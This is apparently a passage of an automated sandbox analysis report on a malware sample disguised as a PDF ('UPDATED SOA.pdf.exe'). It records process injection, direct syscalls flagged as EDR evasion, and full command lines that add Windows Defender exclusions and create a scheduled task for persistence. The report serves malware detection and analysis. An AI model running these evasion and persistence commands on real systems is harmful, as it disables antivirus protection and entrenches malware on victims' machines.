                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_014F4AD0 mov eax, dword ptr fs:[00000030h]9_2_014F4AD0
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_014F4AD0 mov eax, dword ptr fs:[00000030h]9_2_014F4AD0
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_014FAAEE mov eax, dword ptr fs:[00000030h]9_2_014FAAEE
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_014FAAEE mov eax, dword ptr fs:[00000030h]9_2_014FAAEE
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_014CEA80 mov eax, dword ptr fs:[00000030h]9_2_014CEA80
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_014CEA80 mov eax, dword ptr fs:[00000030h]9_2_014CEA80
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_014CEA80 mov eax, dword ptr fs:[00000030h]9_2_014CEA80
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_014CEA80 mov eax, dword ptr fs:[00000030h]9_2_014CEA80
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_014CEA80 mov eax, dword ptr fs:[00000030h]9_2_014CEA80
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_014CEA80 mov eax, dword ptr fs:[00000030h]9_2_014CEA80
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_014CEA80 mov eax, dword ptr fs:[00000030h]9_2_014CEA80
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_014CEA80 mov eax, dword ptr fs:[00000030h]9_2_014CEA80
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_014CEA80 mov eax, dword ptr fs:[00000030h]9_2_014CEA80
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_01594A80 mov eax, dword ptr fs:[00000030h]9_2_01594A80
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_014F8A90 mov edx, dword ptr fs:[00000030h]9_2_014F8A90
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_014C8AA0 mov eax, dword ptr fs:[00000030h]9_2_014C8AA0
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_014C8AA0 mov eax, dword ptr fs:[00000030h]9_2_014C8AA0
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_01516AA4 mov eax, dword ptr fs:[00000030h]9_2_01516AA4
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_014C8D59 mov eax, dword ptr fs:[00000030h]9_2_014C8D59
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_014C8D59 mov eax, dword ptr fs:[00000030h]9_2_014C8D59
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_014C8D59 mov eax, dword ptr fs:[00000030h]9_2_014C8D59
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_014C8D59 mov eax, dword ptr fs:[00000030h]9_2_014C8D59
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_014C8D59 mov eax, dword ptr fs:[00000030h]9_2_014C8D59
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_014C0D59 mov eax, dword ptr fs:[00000030h]9_2_014C0D59
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_014C0D59 mov eax, dword ptr fs:[00000030h]9_2_014C0D59
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_014C0D59 mov eax, dword ptr fs:[00000030h]9_2_014C0D59
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_01558D6B mov eax, dword ptr fs:[00000030h]9_2_01558D6B
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeMemory allocated: page read and write | page guardJump to behavior

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Adds a directory exclusion to Windows Defender
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\UPDATED SOA.pdf.exe"
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\TKgtDXuaZu.exe"
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\UPDATED SOA.pdf.exe"Jump to behavior
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\TKgtDXuaZu.exe"Jump to behavior
                Found direct / indirect Syscall (likely to bypass EDR)
                Source: C:\Program Files (x86)\pdtrYVhmFZZvFThwWBoxFercZXeZeXyzNuswdZcmngxeNBIrdNBbEV\S1OoUcW6nwo.exeNtWriteVirtualMemory: Direct from: 0x76F0490C
                Source: C:\Program Files (x86)\pdtrYVhmFZZvFThwWBoxFercZXeZeXyzNuswdZcmngxeNBIrdNBbEV\S1OoUcW6nwo.exeNtOpenKeyEx: Direct from: 0x76F03C9C
                Source: C:\Program Files (x86)\pdtrYVhmFZZvFThwWBoxFercZXeZeXyzNuswdZcmngxeNBIrdNBbEV\S1OoUcW6nwo.exeNtClose: Direct from: 0x76F02B6C
                Source: C:\Program Files (x86)\pdtrYVhmFZZvFThwWBoxFercZXeZeXyzNuswdZcmngxeNBIrdNBbEV\S1OoUcW6nwo.exeNtReadVirtualMemory: Direct from: 0x76F02E8C
                Source: C:\Program Files (x86)\pdtrYVhmFZZvFThwWBoxFercZXeZeXyzNuswdZcmngxeNBIrdNBbEV\S1OoUcW6nwo.exeNtCreateKey: Direct from: 0x76F02C6C
                Source: C:\Program Files (x86)\pdtrYVhmFZZvFThwWBoxFercZXeZeXyzNuswdZcmngxeNBIrdNBbEV\S1OoUcW6nwo.exeNtSetInformationThread: Direct from: 0x76F02B4C
                Source: C:\Program Files (x86)\pdtrYVhmFZZvFThwWBoxFercZXeZeXyzNuswdZcmngxeNBIrdNBbEV\S1OoUcW6nwo.exeNtQueryAttributesFile: Direct from: 0x76F02E6C
                Source: C:\Program Files (x86)\pdtrYVhmFZZvFThwWBoxFercZXeZeXyzNuswdZcmngxeNBIrdNBbEV\S1OoUcW6nwo.exeNtAllocateVirtualMemory: Direct from: 0x76F048EC
                Source: C:\Program Files (x86)\pdtrYVhmFZZvFThwWBoxFercZXeZeXyzNuswdZcmngxeNBIrdNBbEV\S1OoUcW6nwo.exeNtQuerySystemInformation: Direct from: 0x76F048CC
                Source: C:\Program Files (x86)\pdtrYVhmFZZvFThwWBoxFercZXeZeXyzNuswdZcmngxeNBIrdNBbEV\S1OoUcW6nwo.exeNtQueryVolumeInformationFile: Direct from: 0x76F02F2C
                Source: C:\Program Files (x86)\pdtrYVhmFZZvFThwWBoxFercZXeZeXyzNuswdZcmngxeNBIrdNBbEV\S1OoUcW6nwo.exeNtOpenSection: Direct from: 0x76F02E0C
                Source: C:\Program Files (x86)\pdtrYVhmFZZvFThwWBoxFercZXeZeXyzNuswdZcmngxeNBIrdNBbEV\S1OoUcW6nwo.exeNtDeviceIoControlFile: Direct from: 0x76F02AEC
                Source: C:\Program Files (x86)\pdtrYVhmFZZvFThwWBoxFercZXeZeXyzNuswdZcmngxeNBIrdNBbEV\S1OoUcW6nwo.exeNtQueryValueKey: Direct from: 0x76F02BEC
                Source: C:\Program Files (x86)\pdtrYVhmFZZvFThwWBoxFercZXeZeXyzNuswdZcmngxeNBIrdNBbEV\S1OoUcW6nwo.exeNtCreateFile: Direct from: 0x76F02FEC
                Source: C:\Program Files (x86)\pdtrYVhmFZZvFThwWBoxFercZXeZeXyzNuswdZcmngxeNBIrdNBbEV\S1OoUcW6nwo.exeNtOpenFile: Direct from: 0x76F02DCC
                Source: C:\Program Files (x86)\pdtrYVhmFZZvFThwWBoxFercZXeZeXyzNuswdZcmngxeNBIrdNBbEV\S1OoUcW6nwo.exeNtSetInformationThread: Direct from: 0x76F02ECC
                Source: C:\Program Files (x86)\pdtrYVhmFZZvFThwWBoxFercZXeZeXyzNuswdZcmngxeNBIrdNBbEV\S1OoUcW6nwo.exeNtQueryInformationToken: Direct from: 0x76F02CAC
                Source: C:\Program Files (x86)\pdtrYVhmFZZvFThwWBoxFercZXeZeXyzNuswdZcmngxeNBIrdNBbEV\S1OoUcW6nwo.exeNtProtectVirtualMemory: Direct from: 0x76EF7B2E
                Source: C:\Program Files (x86)\pdtrYVhmFZZvFThwWBoxFercZXeZeXyzNuswdZcmngxeNBIrdNBbEV\S1OoUcW6nwo.exeNtOpenKeyEx: Direct from: 0x76F02B9C
                Source: C:\Program Files (x86)\pdtrYVhmFZZvFThwWBoxFercZXeZeXyzNuswdZcmngxeNBIrdNBbEV\S1OoUcW6nwo.exeNtProtectVirtualMemory: Direct from: 0x76F02F9C
                Source: C:\Program Files (x86)\pdtrYVhmFZZvFThwWBoxFercZXeZeXyzNuswdZcmngxeNBIrdNBbEV\S1OoUcW6nwo.exeNtSetInformationProcess: Direct from: 0x76F02C5C
                Source: C:\Program Files (x86)\pdtrYVhmFZZvFThwWBoxFercZXeZeXyzNuswdZcmngxeNBIrdNBbEV\S1OoUcW6nwo.exeNtNotifyChangeKey: Direct from: 0x76F03C2C
                Source: C:\Program Files (x86)\pdtrYVhmFZZvFThwWBoxFercZXeZeXyzNuswdZcmngxeNBIrdNBbEV\S1OoUcW6nwo.exeNtCreateMutant: Direct from: 0x76F035CC
                Source: C:\Program Files (x86)\pdtrYVhmFZZvFThwWBoxFercZXeZeXyzNuswdZcmngxeNBIrdNBbEV\S1OoUcW6nwo.exeNtWriteVirtualMemory: Direct from: 0x76F02E3C
                Source: C:\Program Files (x86)\pdtrYVhmFZZvFThwWBoxFercZXeZeXyzNuswdZcmngxeNBIrdNBbEV\S1OoUcW6nwo.exeNtMapViewOfSection: Direct from: 0x76F02D1C
                Source: C:\Program Files (x86)\pdtrYVhmFZZvFThwWBoxFercZXeZeXyzNuswdZcmngxeNBIrdNBbEV\S1OoUcW6nwo.exeNtResumeThread: Direct from: 0x76F036AC
                Source: C:\Program Files (x86)\pdtrYVhmFZZvFThwWBoxFercZXeZeXyzNuswdZcmngxeNBIrdNBbEV\S1OoUcW6nwo.exeNtAllocateVirtualMemory: Direct from: 0x76F02BFC
                Source: C:\Program Files (x86)\pdtrYVhmFZZvFThwWBoxFercZXeZeXyzNuswdZcmngxeNBIrdNBbEV\S1OoUcW6nwo.exeNtReadFile: Direct from: 0x76F02ADC
                Source: C:\Program Files (x86)\pdtrYVhmFZZvFThwWBoxFercZXeZeXyzNuswdZcmngxeNBIrdNBbEV\S1OoUcW6nwo.exeNtQuerySystemInformation: Direct from: 0x76F02DFC
                Source: C:\Program Files (x86)\pdtrYVhmFZZvFThwWBoxFercZXeZeXyzNuswdZcmngxeNBIrdNBbEV\S1OoUcW6nwo.exeNtDelayExecution: Direct from: 0x76F02DDC
                Source: C:\Program Files (x86)\pdtrYVhmFZZvFThwWBoxFercZXeZeXyzNuswdZcmngxeNBIrdNBbEV\S1OoUcW6nwo.exeNtQueryInformationProcess: Direct from: 0x76F02C26
                Source: C:\Program Files (x86)\pdtrYVhmFZZvFThwWBoxFercZXeZeXyzNuswdZcmngxeNBIrdNBbEV\S1OoUcW6nwo.exeNtResumeThread: Direct from: 0x76F02FBC
                Source: C:\Program Files (x86)\pdtrYVhmFZZvFThwWBoxFercZXeZeXyzNuswdZcmngxeNBIrdNBbEV\S1OoUcW6nwo.exeNtCreateUserProcess: Direct from: 0x76F0371C
                Injects a PE file into a foreign processes
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeMemory written: C:\Users\user\Desktop\UPDATED SOA.pdf.exe base: 400000 value starts with: 4D5AJump to behavior
                Maps a DLL or memory area into another process
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeSection loaded: NULL target: C:\Program Files (x86)\pdtrYVhmFZZvFThwWBoxFercZXeZeXyzNuswdZcmngxeNBIrdNBbEV\S1OoUcW6nwo.exe protection: execute and read and writeJump to behavior
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeSection loaded: NULL target: C:\Windows\SysWOW64\expand.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\expand.exeSection loaded: NULL target: C:\Program Files (x86)\pdtrYVhmFZZvFThwWBoxFercZXeZeXyzNuswdZcmngxeNBIrdNBbEV\S1OoUcW6nwo.exe protection: read write
                Source: C:\Windows\SysWOW64\expand.exeSection loaded: NULL target: C:\Program Files (x86)\pdtrYVhmFZZvFThwWBoxFercZXeZeXyzNuswdZcmngxeNBIrdNBbEV\S1OoUcW6nwo.exe protection: execute and read and write
                Source: C:\Windows\SysWOW64\expand.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write
                Source: C:\Windows\SysWOW64\expand.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write
                Modifies the context of a thread in another process (thread injection)
                Source: C:\Windows\SysWOW64\expand.exeThread register set: target process: 648
                Queues an APC in another process (thread injection)
                Source: C:\Windows\SysWOW64\expand.exeThread APC queued: target process: C:\Program Files (x86)\pdtrYVhmFZZvFThwWBoxFercZXeZeXyzNuswdZcmngxeNBIrdNBbEV\S1OoUcW6nwo.exe
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\UPDATED SOA.pdf.exe"Jump to behavior
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\TKgtDXuaZu.exe"Jump to behavior
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\TKgtDXuaZu" /XML "C:\Users\user\AppData\Local\Temp\tmpCB57.tmp"Jump to behavior
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeProcess created: C:\Users\user\Desktop\UPDATED SOA.pdf.exe "C:\Users\user\Desktop\UPDATED SOA.pdf.exe"Jump to behavior
                Source: C:\Users\user\AppData\Roaming\TKgtDXuaZu.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\TKgtDXuaZu" /XML "C:\Users\user\AppData\Local\Temp\tmpDE33.tmp"Jump to behavior
                Source: C:\Users\user\AppData\Roaming\TKgtDXuaZu.exeProcess created: C:\Users\user\AppData\Roaming\TKgtDXuaZu.exe "C:\Users\user\AppData\Roaming\TKgtDXuaZu.exe"Jump to behavior
                Source: C:\Program Files (x86)\pdtrYVhmFZZvFThwWBoxFercZXeZeXyzNuswdZcmngxeNBIrdNBbEV\S1OoUcW6nwo.exeProcess created: C:\Windows\SysWOW64\expand.exe "C:\Windows\SysWOW64\expand.exe"
                Source: C:\Windows\SysWOW64\expand.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
                Source: S1OoUcW6nwo.exe, 00000011.00000002.4143656981.0000000001B40000.00000002.00000001.00040000.00000000.sdmp, S1OoUcW6nwo.exe, 00000011.00000000.1956568922.0000000001B41000.00000002.00000001.00040000.00000000.sdmp, S1OoUcW6nwo.exe, 00000013.00000000.2102020095.00000000018B0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
                Source: S1OoUcW6nwo.exe, 00000011.00000002.4143656981.0000000001B40000.00000002.00000001.00040000.00000000.sdmp, S1OoUcW6nwo.exe, 00000011.00000000.1956568922.0000000001B41000.00000002.00000001.00040000.00000000.sdmp, S1OoUcW6nwo.exe, 00000013.00000000.2102020095.00000000018B0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
                Source: S1OoUcW6nwo.exe, 00000011.00000002.4143656981.0000000001B40000.00000002.00000001.00040000.00000000.sdmp, S1OoUcW6nwo.exe, 00000011.00000000.1956568922.0000000001B41000.00000002.00000001.00040000.00000000.sdmp, S1OoUcW6nwo.exe, 00000013.00000000.2102020095.00000000018B0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
                Source: S1OoUcW6nwo.exe, 00000011.00000002.4143656981.0000000001B40000.00000002.00000001.00040000.00000000.sdmp, S1OoUcW6nwo.exe, 00000011.00000000.1956568922.0000000001B41000.00000002.00000001.00040000.00000000.sdmp, S1OoUcW6nwo.exe, 00000013.00000000.2102020095.00000000018B0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: }Program Manager
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeQueries volume information: C:\Users\user\Desktop\UPDATED SOA.pdf.exe VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeQueries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeQueries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeQueries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeQueries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeQueries volume information: C:\Windows\Fonts\Candaral.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeQueries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeQueries volume information: C:\Windows\Fonts\Candarali.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeQueries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeQueries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeQueries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeQueries volume information: C:\Windows\Fonts\constan.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeQueries volume information: C:\Windows\Fonts\constani.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeQueries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeQueries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeQueries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeQueries volume information: C:\Windows\Fonts\corbell.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeQueries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeQueries volume information: C:\Windows\Fonts\corbelli.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeQueries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeQueries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeQueries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeQueries volume information: C:\Windows\Fonts\framd.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeQueries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeQueries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeQueries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeQueries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeQueries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeQueries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeQueries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeQueries volume information: C:\Windows\Fonts\taile.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
